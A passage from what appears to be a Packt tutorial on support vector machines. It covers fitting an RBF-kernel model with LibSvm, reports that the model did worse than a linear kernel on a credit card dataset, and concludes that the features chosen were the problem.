to 0 when the distance approaches infinity. To fit an RBF version of our model, we can specify our svm object as follows: svm = ml.LibSvm(svm_type='c_svc', kernel_type='rbf', gamma=0.1, C=1.0) The gamma parameter here specifies how far the influence of a single support vector reaches. Visually, you can investigate the relationship between gamma and C parameters at http://scikit-learn.org/stable/auto_examples/svm/plot_rbf_parameters.html. The rest of the code for the model estimation follows in a similar fashion as with the linear kernel and we obtain the following results: The results are even worse than the linear kernel as the precision and recall were lost across the board. The SVM with the RBF kernel performed worse when classifying calls that resulted in applying for the credit card and those that did not. Summary In this article, we saw that the problem is not with the model but rather, the dataset that we use does not explain the variance sufficiently. This requires going back to the drawing board and selecting other features. Resources for Article: Further resources on this subject: Push your data to the Web [article] Transferring Data from MS Access 2003 to SQL Server 2008 [article] Exporting data from MS Access 2003 to MySQL [article]

0
0
16014

Packt

30 Aug 2013

13 min read

Managing a Hadoop Cluster

Packt

30 Aug 2013

13 min read

0
0
16010

Implementing Apache Spark K-Means Clustering method on digital breath test data for road safety

Make phone calls and send SMS messages from your website using Twilio

Why Motion and Interaction matter in a UX design? [Video]

Getting Started with Data Storytelling

Introducing Kafka

Exploiting Services with Python

Elgg Social Networking - Installation

Hands on Table Calculation Techniques with Tableau

Implementing AJAX Grid using jQuery data grid plugin jqGrid

Getting Started with Android Things

Trending Topics

Creating a quick logo for a company with GIMP 2.6

Shipping and Tax Calculations with PHP 5 Ecommerce

Grunt makes it easy to test and optimize your website. Here's how. [Tutorial]

Support Vector Machines as a Classification Engine

Managing a Hadoop Cluster

Create a Free Account To Continue Reading

Sign in to activate your 7-day free access